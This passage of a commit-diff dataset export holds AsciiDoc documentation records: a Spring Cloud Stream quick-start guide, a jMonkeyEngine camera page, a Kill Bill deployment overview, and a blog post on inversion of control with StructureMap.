Amazon Kinesis).\n* Interoperate between channel-based and non-channel-based application binding scenarios to support stateless and stateful computations by using Project Reactor's Flux and Kafka Streams APIs.\n* Rely on the framework's automatic content-type support for common use-cases. Extending to different data conversion types is possible.\n\n=== Quick Start\n\nYou can try Spring Cloud Stream in less than 5 minutes even before you jump into any details by following this three-step guide.\n\nWe show you how to create a Spring Cloud Stream application that receives messages coming from the messaging middleware of your choice (more on this later) and logs received messages to the console.\nWe call it `LoggingConsumer`.\nWhile not very practical, it provides a good introduction to some of the main concepts\nand abstractions, making it easier to digest the rest of this user guide.\n\nThe three steps are as follows:\n\n. <<spring-cloud-stream-preface-creating-sample-application>>\n. <<spring-cloud-stream-preface-importing-project>>\n. <<spring-cloud-stream-preface-adding-message-handler>>\n\n[[spring-cloud-stream-preface-creating-sample-application]]\n==== Creating a Sample Application by Using Spring Initializr\nTo get started, visit the https:\/\/start.spring.io[Spring Initializr]. 
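\n\nIf you prefer the command line, the Initializr can also generate the same project over plain HTTP. The following one-liner is a sketch that assumes the Initializr's `dependencies` and `artifactId` request parameters and the dependency identifiers `cloud-stream` and `amqp` (for RabbitMQ):\n\n[source,bash]\n----\ncurl https:\/\/start.spring.io\/starter.zip -d dependencies=cloud-stream,amqp -d artifactId=logging-consumer -o logging-consumer.zip\n----\n\nThe rest of this section walks through the equivalent web UI flow.\n\n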
From there, you can generate our `LoggingConsumer` application. To do so:\n\n. In the *Dependencies* section, start typing `stream`.\nWhen the \"`Cloud Stream`\" option appears, select it.\n. Start typing either 'kafka' or 'rabbit'.\n. Select \"`Kafka`\" or \"`RabbitMQ`\".\n+\nBasically, you choose the messaging middleware to which your application binds.\nWe recommend using the one you have already installed or feel more comfortable with installing and running.\nAlso, as you can see from the Initializr screen, there are a few other options you can choose.\nFor example, you can choose Gradle as your build tool instead of Maven (the default).\n. In the *Artifact* field, type 'logging-consumer'.\n+\nThe value of the *Artifact* field becomes the application name.\nIf you chose RabbitMQ for the middleware, your Spring Initializr should now be as follows:\n\n[%hardbreaks]\n[%hardbreaks]\n[%hardbreaks]\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/spring-initializr.png[align=\"center\"]\n\n[%hardbreaks]\n[%hardbreaks]\n\n. Click the *Generate Project* button.\n+\nDoing so downloads the zipped version of the generated project to your hard drive.\n. Unzip the file into the folder you want to use as your project directory.\n\nTIP: We encourage you to explore the many possibilities available in the Spring Initializr.\nIt lets you create many different kinds of Spring applications.\n\n[[spring-cloud-stream-preface-importing-project]]\n==== Importing the Project into Your IDE\n\nNow you can import the project into your IDE.\nKeep in mind that, depending on the IDE, you may need to follow a specific import procedure.\nFor example, the procedure depends on how the project was generated (Maven or Gradle): in Eclipse or STS, you need to use File -> Import -> Maven -> Existing Maven Project.\n\nOnce imported, the project must have no errors of any kind.
Also, `src\/main\/java` should contain `com.example.loggingconsumer.LoggingConsumerApplication`.\n\nTechnically, at this point, you can run the application's main class.\nIt is already a valid Spring Boot application.\nHowever, it does not do anything, so we want to add some code.\n\n[[spring-cloud-stream-preface-adding-message-handler]]\n==== Adding a Message Handler, Building, and Running\n\nModify the `com.example.loggingconsumer.LoggingConsumerApplication` class to look as follows:\n\n[source, java]\n----\n@SpringBootApplication\npublic class LoggingConsumerApplication {\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(LoggingConsumerApplication.class, args);\n\t}\n\n\t@Bean\n\tpublic Consumer<Person> log() {\n\t return person -> {\n\t System.out.println(\"Received: \" + person);\n\t };\n\t}\n\n\tpublic static class Person {\n\t\tprivate String name;\n\t\tpublic String getName() {\n\t\t\treturn name;\n\t\t}\n\t\tpublic void setName(String name) {\n\t\t\tthis.name = name;\n\t\t}\n\t\tpublic String toString() {\n\t\t\treturn this.name;\n\t\t}\n\t}\n}\n----\n\nAs you can see from the preceding listing:\n\n* We are using the functional programming model (see <<Spring Cloud Function support>>) to define a single message handler as a `Consumer`.\n* We are relying on framework conventions to bind such a handler to the input destination binding exposed by the binder.\n\nDoing so also lets you see one of the core features of the framework: It tries to automatically convert incoming message payloads to type `Person`.\n\nYou now have a fully functional Spring Cloud Stream application that listens for messages.\nFrom here, for simplicity, we assume you selected RabbitMQ in <<spring-cloud-stream-preface-creating-sample-application,step one>>.\nAssuming you have RabbitMQ installed and running, you can start the application by running its `main` method in your IDE.\n\nYou should see the following output:\n\n[source]\n----\n\t--- [ main] c.s.b.r.p.RabbitExchangeQueueProvisioner : declaring queue for inbound: input.anonymous.CbMIwdkJSBO1ZoPDOtHtCg, bound to: input\n\t--- [ main] o.s.a.r.c.CachingConnectionFactory : Attempting to connect to: [localhost:5672]\n\t--- [ main] o.s.a.r.c.CachingConnectionFactory : Created new connection: rabbitConnectionFactory#2a3a299:0\/SimpleConnection@66c83fc8. . .\n\t. . .\n\t--- [ main] o.s.i.a.i.AmqpInboundChannelAdapter : started inbound.input.anonymous.CbMIwdkJSBO1ZoPDOtHtCg\n\t. . .\n\t--- [ main] c.e.l.LoggingConsumerApplication : Started LoggingConsumerApplication in 2.531 seconds (JVM running for 2.897)\n----\n\nGo to the RabbitMQ management console or any other RabbitMQ client and send a message to `input.anonymous.CbMIwdkJSBO1ZoPDOtHtCg`.\nThe `anonymous.CbMIwdkJSBO1ZoPDOtHtCg` part represents the group name and is generated, so it is bound to be different in your environment.\nFor something more predictable, you can use an explicit group name by setting `spring.cloud.stream.bindings.input.group=hello` (or whatever name you like).\n\nThe contents of the message should be a JSON representation of the `Person` class, as follows:\n\n\t{\"name\":\"Sam Spade\"}\n\nThen, in your console, you should see:\n\n`Received: Sam Spade`
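\n\nAlternatively, you can publish the test message from code. The following is a minimal sketch of ours, not part of the guide's sample: it uses Spring AMQP's `RabbitTemplate`, assumes `spring-boot-starter-amqp` is on the classpath, and relies on the Rabbit binder's convention of declaring a topic exchange named after the destination (`input`):\n\n[source, java]\n----\n@Autowired\nprivate RabbitTemplate rabbitTemplate;\n\npublic void sendTestMessage() {\n\t\/\/ Any routing key works here: the anonymous consumer queue is bound with a match-all pattern\n\tString payload = \"{\\\"name\\\":\\\"Sam Spade\\\"}\";\n\trabbitTemplate.convertAndSend(\"input\", \"\", payload);\n}\n----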
\n\nYou can also build and package your application into a boot jar (by using `.\/mvnw clean install`) and run the built JAR by using the `java -jar` command.\n\nNow you have a working (albeit very basic) Spring Cloud Stream application.\n\n== What's New in 3.0?\n\n\n[[spring-cloud-stream-preface-new-features]]\n=== New Features and Enhancements\n\n- *Routing Function* - see <<Routing with functions>> for more details.\n- *Multiple bindings with functions* (multiple message handlers) - see <<Multiple functions in a single application>> for more details.\n- *Functions with multiple inputs\/outputs* (single function that can subscribe or target multiple destinations) - see <<Functions with multiple input and output arguments>> for more details.\n- *Native support for reactive programming* - since v3.0.0 we no longer distribute the spring-cloud-stream-reactive modules and instead\nrely on the native reactive support provided by Spring Cloud Function. For backward\ncompatibility you can still bring `spring-cloud-stream-reactive` from previous versions.\n\n\n[[spring-cloud-stream-preface-notable-deprecations]]\n=== Notable Deprecations\n\n- _Reactive module_ (`spring-cloud-stream-reactive`) is discontinued and no longer distributed, in favor of native support via spring-cloud-function.\nFor backward\ncompatibility you can still bring `spring-cloud-stream-reactive` from previous versions.\n- _Test support binder_ `spring-cloud-stream-test-support` (with MessageCollector) is deprecated in favor of a new test binder. See <<Testing>> for more details.\n- _@StreamMessageConverter_ - deprecated as it is no longer required.\n- The `original-content-type` header references have been removed after being deprecated in v2.0.\n","old_contents":"=== A Brief History of Spring's Data Integration Journey\n\nSpring's journey on Data Integration started with https:\/\/projects.spring.io\/spring-integration\/[Spring Integration]. With its programming model, it provided a consistent developer experience to build applications that can embrace http:\/\/www.enterpriseintegrationpatterns.com\/[Enterprise Integration Patterns] to connect with external systems such as, databases, message brokers, and among others.\n\nFast forward to the cloud-era, where microservices have become prominent in the enterprise setting. https:\/\/projects.spring.io\/spring-boot\/[Spring Boot] transformed the way how developers built Applications. With Spring's programming model and the runtime responsibilities handled by Spring Boot, it became seamless to develop stand-alone, production-grade Spring-based microservices.\n\nTo extend this to Data Integration workloads, Spring Integration and Spring Boot were put together into a new project.
Spring Cloud Stream was born.\n\n[%hardbreaks]\nWith Spring Cloud Stream, developers can:\n* Build, test, iterate, and deploy data-centric applications in isolation.\n* Apply modern microservices architecture patterns, including composition through messaging.\n* Decouple application responsibilities with event-centric thinking. An event can represent something that has happened in time, to which the downstream consumer applications can react without knowing where it originated or the producer's identity.\n* Port the business logic onto message brokers (such as RabbitMQ, Apache Kafka, Amazon Kinesis).\n* Interoperate between channel-based and non-channel-based application binding scenarios to support stateless and stateful computations by using Project Reactor's Flux and Kafka Streams APIs.\n* Rely on the framework's automatic content-type support for common use-cases. Extending to different data conversion types is possible.\n\n=== Quick Start\n\nYou can try Spring Cloud Stream in less then 5 min even before you jump into any details by following this three-step guide.\n\nWe show you how to create a Spring Cloud Stream application that receives messages coming from the messaging middleware of your choice (more on this later) and logs received messages to the console.\nWe call it `LoggingConsumer`.\nWhile not very practical, it provides a good introduction to some of the main concepts\nand abstractions, making it easier to digest the rest of this user guide.\n\nThe three steps are as follows:\n\n. <<spring-cloud-stream-preface-creating-sample-application>>\n. <<spring-cloud-stream-preface-importing-project>>\n. <<spring-cloud-stream-preface-adding-message-handler>>\n\n[[spring-cloud-stream-preface-creating-sample-application]]\n==== Creating a Sample Application by Using Spring Initializr\nTo get started, visit the https:\/\/start.spring.io[Spring Initializr]. From there, you can generate our `LoggingConsumer` application. To do so:\n\n. In the *Dependencies* section, start typing `stream`.\nWhen the \"`Cloud Stream`\" option should appears, select it.\n. Start typing either 'kafka' or 'rabbit'.\n. Select \"`Kafka`\" or \"`RabbitMQ`\".\n+\nBasically, you choose the messaging middleware to which your application binds.\nWe recommend using the one you have already installed or feel more comfortable with installing and running.\nAlso, as you can see from the Initilaizer screen, there are a few other options you can choose.\nFor example, you can choose Gradle as your build tool instead of Maven (the default).\n. In the *Artifact* field, type 'logging-consumer'.\n+\nThe value of the *Artifact* field becomes the application name.\nIf you chose RabbitMQ for the middleware, your Spring Initializr should now be as follows:\n\n[%hardbreaks]\n[%hardbreaks]\n[%hardbreaks]\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/spring-initializr.png[align=\"center\"]\n\n[%hardbreaks]\n[%hardbreaks]\n\n. Click the *Generate Project* button.\n+\nDoing so downloads the zipped version of the generated project to your hard drive.\n. 
Unzip the file into the folder you want to use as your project directory.\n\nTIP: We encourage you to explore the many possibilities available in the Spring Initializr.\nIt lets you create many different kinds of Spring applications.\n\n[[spring-cloud-stream-preface-importing-project]]\n==== Importing the Project into Your IDE\n\nNow you can import the project into your IDE.\nKeep in mind that, depending on the IDE, you may need to follow a specific import procedure.\nFor example, depending on how the project was generated (Maven or Gradle), you may need to follow specific import procedure (for example, in Eclipse or STS, you need to use File -> Import -> Maven -> Existing Maven Project).\n\nOnce imported, the project must have no errors of any kind. Also, `src\/main\/java` should contain `com.example.loggingconsumer.LoggingConsumerApplication`.\n\nTechnically, at this point, you can run the application's main class.\nIt is already a valid Spring Boot application.\nHowever, it does not do anything, so we want to add some code.\n\n[[spring-cloud-stream-preface-adding-message-handler]]\n==== Adding a Message Handler, Building, and Running\n\nModify the `com.example.loggingconsumer.LoggingConsumerApplication` class to look as follows:\n\n[source, java]\n----\n@SpringBootApplication\npublic class LoggingConsumerApplication {\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(LoggingConsumerApplication.class, args);\n\t}\n\n\t@Bean\n\tpublic Consumer<Person> log() {\n\t return person -> {\n\t System.out.println(\"Received: \" + person);\n\t };\n\t}\n\n\tpublic static class Person {\n\t\tprivate String name;\n\t\tpublic String getName() {\n\t\t\treturn name;\n\t\t}\n\t\tpublic void setName(String name) {\n\t\t\tthis.name = name;\n\t\t}\n\t\tpublic String toString() {\n\t\t\treturn this.name;\n\t\t}\n\t}\n}\n----\n\nAs you can see from the preceding listing:\n\n* We are using functional programming model (see <<Spring Cloud Function support>>) to define a single message handler as `Consumer`.\n* We are relying on framework conventions to bind such handler to the input destination binding exposed by the binder.\n\nDoing so also lets you see one of the core features of the framework: It tries to automatically convert incoming message payloads to type `Person`.\n\nYou now have a fully functional Spring Cloud Stream application that does listens for messages.\nFrom here, for simplicity, we assume you selected RabbitMQ in <<spring-cloud-stream-preface-creating-sample-application,step one>>.\nAssuming you have RabbitMQ installed and running, you can start the application by running its `main` method in your IDE.\n\nYou should see following output:\n\n[source]\n----\n\t--- [ main] c.s.b.r.p.RabbitExchangeQueueProvisioner : declaring queue for inbound: input.anonymous.CbMIwdkJSBO1ZoPDOtHtCg, bound to: input\n\t--- [ main] o.s.a.r.c.CachingConnectionFactory : Attempting to connect to: [localhost:5672]\n\t--- [ main] o.s.a.r.c.CachingConnectionFactory : Created new connection: rabbitConnectionFactory#2a3a299:0\/SimpleConnection@66c83fc8. . .\n\t. . .\n\t--- [ main] o.s.i.a.i.AmqpInboundChannelAdapter : started inbound.input.anonymous.CbMIwdkJSBO1ZoPDOtHtCg\n\t. . 
.\n\t--- [ main] c.e.l.LoggingConsumerApplication : Started LoggingConsumerApplication in 2.531 seconds (JVM running for 2.897)\n----\n\nGo to the RabbitMQ management console or any other RabbitMQ client and send a message to `input.anonymous.CbMIwdkJSBO1ZoPDOtHtCg`.\nThe `anonymous.CbMIwdkJSBO1ZoPDOtHtCg` part represents the group name and is generated, so it is bound to be different in your environment.\nFor something more predictable, you can use an explicit group name by setting `spring.cloud.stream.bindings.input.group=hello` (or whatever name you like).\n\nThe contents of the message should be a JSON representation of the `Person` class, as follows:\n\n\t{\"name\":\"Sam Spade\"}\n\nThen, in your console, you should see:\n\n`Received: Sam Spade`\n\nYou can also build and package your application into a boot jar (by using `.\/mvnw clean install`) and run the built JAR by using the `java -jar` command.\n\nNow you have a working (albeit very basic) Spring Cloud Stream application.\n\n== What's New in 3.0?\n\n\n[[spring-cloud-stream-preface-new-features]]\n=== New Features and Components\n\n- *Routing Function* - see <<Routing with functions>> for more details.\n- *Multiple bindings with functions* (multiple message handlers) - see <<Multiple functions in a single application>> for more details.\n- *Functions with multiple inputs\/outputs* (single function that can subscribe or target multiple destinations) - see <<Functions with multiple input and output arguments>> for more details.\n- *Native support for reactive programming* - since v3.0.0 we no longer distribute spring-cloud-stream-reactive modules and instead\nrelying on native reactive support provided by spring cloud function. For backward\ncompatibility you can still bring `spring-cloud-stream-reactive` from previous versions.\n\n\n[[spring-cloud-stream-preface-notable-enhancements]]\n=== Notable Enhancements\nTBD\n\n[[spring-cloud-stream-preface-notable-deprecations]]\n=== Notable Deprecations\n\n- Reactive module (`spring-cloud-stream-reactive`) is discontinued and no longer distributed in favor of native support via spring-cloud-function.\nFor backward\ncompatibility you can still bring `spring-cloud-stream-reactive` from previous versions.\n- We've deprecated `spring-cloud-stream-test-support` with MessageCollector in favor of a new test binder. See <<Testing>> for more details.\n- @StreamMessageConverter - deprecated as it is no longer required.\n- The reliance on the `original-content-type` has been removed after it's been deprecated in v2.0.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec875499f73f7e5f473ae7e61407539d5bf95ed3","subject":"Corrected moving the Camera topic.","message":"Corrected moving the Camera topic.\n\nCorrected moving the Camera topic not to use a deprecated method.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/remote-controlling_the_camera.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/remote-controlling_the_camera.adoc","new_contents":"= Remote-Controlling the Camera\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: camera, documentation, cinematics\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== Positioning the Camera\n\nYou can steer the camera using <<jme3\/advanced\/cinematics#,Cinematics>>:\n\n. 
Create a Cinematic.\n. Create a CameraNode and bind the camera object to the Cinematic. Note that we also give the camera node a name in this step. \n+\n[source,java]\n----\nCameraNode camNode = cinematic.bindCamera(\"topView\", cam);\n----\n\n. Position the camera node in its start location.\n. Use activateCamera() to give control of the camera to this node. You now see the scene from this camera's point of view. For example, to see through the camera node named \u201ctopView\u201d, 6 seconds after the start of the cinematic, you'd write \n+\n[source,java]\n----\ncinematic.activateCamera(6, \"topView\");\n----\n\n\n\n=== Code Sample\n\n[source,java]\n----\n\nflyCam.setEnabled(false);\nCinematic cinematic = new Cinematic(rootNode, 20);\n\nCameraNode camNodeTop = cinematic.bindCamera(\"topView\", cam);\ncamNodeTop.setControlDir(ControlDirection.SpatialToCamera);\ncamNodeTop.getControl(0).setEnabled(false);\n\nCameraNode camNodeSide = cinematic.bindCamera(\"sideView\", cam);\ncamNodeSide.setControlDir(ControlDirection.CameraToSpatial);\ncamNodeSide.getControl(0).setEnabled(false);\n\n----\n\n\n== Moving the Camera\n\nIf desired, attach the camNode to a MotionEvent to let it travel along waypoints. This is demonstrated in the link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-examples\/src\/main\/java\/jme3test\/animation\/TestCameraMotionPath.java[TestCameraMotionPath.java] example.\n","old_contents":"= Remote-Controlling the Camera\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: camera, documentation, cinematics\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== Positioning the Camera\n\nYou can steer the camera using <<jme3\/advanced\/cinematics#,Cinematics>>:\n\n. Create a Cinematic.\n. Create a CameraNode and bind the camera object to the Cinematic. Note that we also give the camera node a name in this step. \n+\n[source,java]\n----\nCameraNode camNode = cinematic.bindCamera(\"topView\", cam);\n----\n\n. Position the camera node in its start location.\n. Use activateCamera() to give the control of the camera to this node. You now see the scene from this camera's point of view. For example to see through the camera node named \u201ctopView, 6 seconds after the start of the cinematic, you'd write \n+\n[source,java]\n----\ncinematic.activateCamera(6, \"topView\");\n----\n\n\n\n=== Code Sample\n\n[source,java]\n----\n\nflyCam.setEnabled(false);\nCinematic cinematic = new Cinematic(rootNode, 20);\n\nCameraNode camNodeTop = cinematic.bindCamera(\"topView\", cam);\ncamNodeTop.setControlDir(ControlDirection.SpatialToCamera);\ncamNodeTop.getControl(0).setEnabled(false);\n\nCameraNode camNodeSide = cinematic.bindCamera(\"sideView\", cam);\ncamNodeSide.setControlDir(ControlDirection.CameraToSpatial);\ncamNodeSide.getControl(0).setEnabled(false);\n\n----\n\n\n== Moving the Camera\n\nIf desired, attach the camNode to a MotionTrack to let it travel along waypoints.
This is demonstrated in the link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-examples\/src\/main\/java\/jme3test\/animation\/TestCameraMotionPath.java[TestCameraMotionPath.java] example.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"dd89c9e9ca9b5688fe7756525e8e6fd4b61785e9","subject":"Update deployment-overview.adoc","message":"Update deployment-overview.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/platform\/includes\/deployment-overview.adoc","new_file":"userguide\/platform\/includes\/deployment-overview.adoc","new_contents":"=== Overview\n\nKill Bill (whether used as a Billing System and\/or Payment System) is fundamentally a backend system, so the following considerations should apply:\n\n* Don't make the system visible to the outside world; instead you should have a front end system, or a reverse proxy, in front of it; if you need to handle gateway notifications (e.g. IPN\/Internal Payment Notification), we developed an https:\/\/github.com\/killbill\/killbill-notifications-proxy[app] for that specific purpose\n* Always deploy at least 2 instances (for reliability purposes) in front of a load balancer\n* Set up your database with a master and a slave instance, and configure it to take regular snapshots\n* Aggregate your logs (for example using http:\/\/logstash.net\/[LogStash], https:\/\/www.graylog.org\/[GrayLog2], ...) and take a look at our https:\/\/github.com\/killbill\/killbill\/wiki\/Logback-recipes[Logback recipes]\n* Look at all the existing Kill Bill JMX metrics (using VisualVM, jconsole, ...) and set some alerts (for instance by using the following https:\/\/github.com\/killbill\/nagios-jmx-plugin[script])\n* Configure your system properly, especially when it comes to the https:\/\/github.com\/killbill\/killbill\/wiki\/Kill-Bill-Bus-and-Notification-Queue-Configuration[settings of the bus and notification queue].\n\n\nWhen deploying Kill Bill, the following pieces will need to be deployed in addition to your OS, VM or container (Docker, ...):\n\n* A web container (Jetty, Tomcat, ...)\n* The killbill war\n* The plugins\n* The configuration files and system properties\n* The database along with the various schemas: the Kill Bill schema is available from our http:\/\/killbill.io\/downloads[download page] and each stateful plugin will\/should expose such a schema (for example, here is the https:\/\/github.com\/killbill\/killbill-adyen-plugin\/blob\/master\/src\/main\/resources\/ddl.sql[schema] for the Adyen plugin)\n\nIn order to ease the deployment, we created https:\/\/github.com\/killbill\/killbill-cloud\/tree\/master\/kpm[KPM], the Kill Bill Package Manager. KPM can fetch existing (signed) artifacts for the main killbill war and for each of the plugins, and deploy them in the right place. KPM can also deploy Tomcat.
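\n\nTo give a feel for how KPM is driven, here is a hypothetical `kpm.yml` sketch of ours (the exact schema, version numbers and plugin names below are placeholders and may differ between KPM releases; check the KPM README for the authoritative format):\n\n[source,yaml]\n----\n# Illustrative only: versions and plugin names are placeholders\nkillbill:\n  version: 0.16.3\n  plugins:\n    java:\n      - name: analytics\n    ruby:\n      - name: stripe\n----\n\nSuch a file would typically be consumed with `kpm install kpm.yml`.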
\n\nIn addition to KPM, we also provide https:\/\/registry.hub.docker.com\/u\/killbill\/killbill[Docker images]. Those images internally rely on KPM to fetch the various artifacts and install them at the right location on the image. The docker `run` command lets you override existing Kill Bill system properties.\n\nNote that one can decide to only use KPM for fetching and installing artifacts, and bypass Docker to deploy on VMs or bare metal. Alternatively, one can use other tools or manual steps to fetch those artifacts from http:\/\/search.maven.org\/[Maven Central], or use our convenient http:\/\/killbill.io\/downloads[download page].\n","old_contents":"=== Overview\n\nKill Bill (whether used as a Billing System or Payment System) is fundamentally a backend system and so the following consideration should apply:\n\n* Don't make the system visible to the outside world, you should have a front end system, or a reverse proxy in front of it; if you need to handle some IPN (Internal Payment Notification), we developed an https:\/\/github.com\/killbill\/killbill-notifications-proxy[app] for that specific purpose.\n* Always deploy at least 2 instances (for reliability purpose) in front of a load balancer.\n* Setup your database with a master and a slave instances, and configure it to take regular snapshots\n* Aggregate your logs (for example using http:\/\/logstash.net\/[LogStash], https:\/\/www.graylog.org\/[GrayLog2], ...) and take a look at our https:\/\/github.com\/killbill\/killbill\/wiki\/Logback-recipes[logback recipes]\n* Look at the all the existing Kill Bill JMX metrics (using VisualVM, jconsole, ...) and set some alerts (for instance by using the following https:\/\/github.com\/killbill\/nagios-jmx-plugin[script])\n* Configure your system properly, especially when it comes to the https:\/\/github.com\/killbill\/killbill\/wiki\/Kill-Bill-Bus-and-Notification-Queue-Configuration[settings of the bus and notification queue].\n\n\nWhen deploying Kill Bill, the following pieces will need to be deployed in addition to your OS, VM or container (Docker, ...):\n\n* A web container (Jetty, Tomcat, ...)\n* The killbill war\n* The plugins\n* The configuration files and system properties\n* The database along with the various schemas: the Kill Bill schema is available from our http:\/\/killbill.io\/downloads[download page] and each stateful plugin will\/should expose such a schema (for example, here is the https:\/\/github.com\/killbill\/killbill-adyen-plugin\/blob\/master\/src\/main\/resources\/ddl.sql[schema] for the Adyen plugin)\n\nIn order to ease the deployment, we created https:\/\/github.com\/killbill\/killbill-cloud\/tree\/master\/kpm[KPM], the Kill Bill Package Manager. KPM can fetch existing (signed) artifacts for the main killbill war and for each of the plugins, and deploy them at the right place. KPM can also deploy Tomcat.\n\nIn addition to KPM, we also provide https:\/\/registry.hub.docker.com\/u\/killbill\/killbill[Docker images]. Those images internally rely on KPM for fetching the various artifacts and install them at the right location on the image. The docker `run` command allows to override existing Kill Bill system properties.\n\nNote that one can decide to only use KPM for fetching and installing artifacts, and bypass docker to deploy on VMs or bare metal.
Or alternatively one can use other tools, manual steps to fetch those artifacts from http:\/\/search.maven.org\/[Maven Central], or by using our convenient http:\/\/killbill.io\/downloads[download page].\n\nThe following sections below will give manual instructions on how to deploy on various Java containers.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b4dbfdd0691ea72d685654674c7f63b1b2bb5025","subject":"Update 2015-12-02-Inverser-le-controle-avec-StructueMap.adoc","message":"Update 2015-12-02-Inverser-le-controle-avec-StructueMap.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-12-02-Inverser-le-controle-avec-StructueMap.adoc","new_file":"_posts\/2015-12-02-Inverser-le-controle-avec-StructueMap.adoc","new_contents":"= Inverting Control with StructureMap!\n:hp-image: introduction-a-angular2.png\n:published_at: 2015-12-02\n:hp-tags: C#, IoC, StructureMap\n\n\nInversion of control (aka *IoC*) is an architectural pattern that breaks the coupling between dependencies. Thanks to this decoupling, high-level components no longer rest directly on low-level ones; they go through a layer of abstraction instead. The goal is to improve the modularity of applications and thereby ease maintenance and evolution.\n\n\n== Why this pattern?\n\nBefore showing how to put inversion of control in place, it is worth explaining how we got here!\n\nThe starting problem is actually quite simple. If an application is built in layers and each layer rests on a lower-level one, what happens when you later want to change, modify or remove the lowest layer? That is the problem right there: the next layer up has to be modified accordingly, and this will quite probably trigger cascading changes through all the layers above.\n\nWith inversion of control, each layer instead rests on an abstraction, so that we go from this:\n\n[Diagram]\n\nTo this:\n\n[Diagram]\n\nThe difference is subtle but important. In the second diagram, changing the concrete layers of the application causes no structural problem; everything still compiles. Better yet, the application can be developed in the abstract, with no knowledge of how the low level works. Stronger still, I can define abstractions that are consumed by the low-level layers but implemented at the high level. Another interesting point: unit tests become much simpler and more relevant, because dependencies no longer take part in the validation step.\n\nIn the end, by using inversion of control, your application becomes more modular, flexible, maintainable, evolvable and testable.\n\nNOTE: Inversion of control also lets you honor one of the major https:\/\/en.wikipedia.org\/wiki\/SOLID_(object-oriented_design)[SOLID] principles: dependency inversion. This principle states that you should always depend on abstractions, never on implementations. The SOLID principles are considered by many to be the _\"Best Practices\"_ of OOP. They make for effective, reliable development.
\n\nAmong the most common ways of putting IoC in place are:\n\n* The https:\/\/en.wikipedia.org\/wiki\/Factory_(object-oriented_programming)[Factory] pattern, which delegates instance creation. A rudimentary approach, but it has the merit of being simple to set up (a small sketch follows this list).\n* The https:\/\/en.wikipedia.org\/wiki\/Service_locator_pattern[Service Locator] pattern, which uses a registry to look up the implementations matching given contracts.\n* The https:\/\/en.wikipedia.org\/wiki\/Dependency_injection[Dependency injection] pattern, which passes a dependency to a dependent object.
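\n\nTo make the first option concrete, here is a minimal sketch of such a factory (our illustration, reusing the ILogger\/ConsoleLogger pair defined later in this article):\n\n[source,csharp]\n----\n\/\/Delegates instance creation, but callers still have to ask the factory explicitly\npublic static class LoggerFactory\n{\n\tpublic static ILogger Create()\n\t{\n\t\treturn new ConsoleLogger();\n\t}\n}\n----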
\n\nThe rest of this article focuses on the third pattern, Dependency Injection. Factory is too simplistic a pattern to resolve dependencies on its own, and Service Locator has become an anti-pattern over time (notably because it creates coupling, which is exactly the opposite of what we want).\n\n\n== StructureMap in action: the basics!\n\nThere are many libraries dedicated to IoC. Honestly, there is no bad choice, even if I tend to advise against Microsoft's (https:\/\/github.com\/unitycontainer\/unity[Unity]), which lags behind the competition. For my part I long used Ninject for its _\"Simple & Straightforward\"_ side, very effective for development although admittedly a bit slow at runtime. Recently I decided to change and moved to StructureMap, a historic container (the first in C#) that packs countless capabilities with a very decent level of performance. It is a good compromise between capability and power, and since version 3 the team has done a lot of work to get closer to Ninject's approach. Moreover, it has been in active development for almost 10 years, it has rich and complete documentation, and it is the first to offer DNX support with version 4. That is the version we use today!\n\nTo install StructureMap, just add the NuGet package via the command:\n\n----\nInstall-Package StructureMap\n----\n\nThe first class of interest is Container. It is the central element of the library. It lets us define the dependencies to resolve, the way they are resolved, and how they are retrieved.\nTo define a dependency we need a contract. For the purposes of this article, here is one:\n\n[source,csharp]\n----\npublic interface ILogger\n{\n\tvoid Information(string message);\n}\n----\n\nThe interface corresponds to a logger that traces an information message. Its implementation is the following:\n\n[source,csharp]\n----\npublic class ConsoleLogger : ILogger\n{\n\tpublic void Information(string message)\n\t{\n\t\tConsole.WriteLine(message);\n\t}\n}\n----\n\nFor the container to resolve this dependency, it has to be defined. The Container class has a constructor accepting an action that exposes a configuration object. This object defines the bindings between contracts and implementations through the For<T> and Use<T> methods:\n\n[source,csharp]\n----\nvar container = new Container(configuration =>\n{\n\tconfiguration.For<ILogger>().Use<ConsoleLogger>();\n});\n----\n\nBoth methods also have overloads taking Type objects as parameters. The result is the same, but it is syntactically heavier to read.
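\n\nFor completeness, here is what the non-generic form looks like; the binding is equivalent to the generic calls above:\n\n[source,csharp]\n----\n\/\/Same binding as For<ILogger>().Use<ConsoleLogger>(), expressed with Type objects\nconfiguration.For(typeof(ILogger)).Use(typeof(ConsoleLogger));\n----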
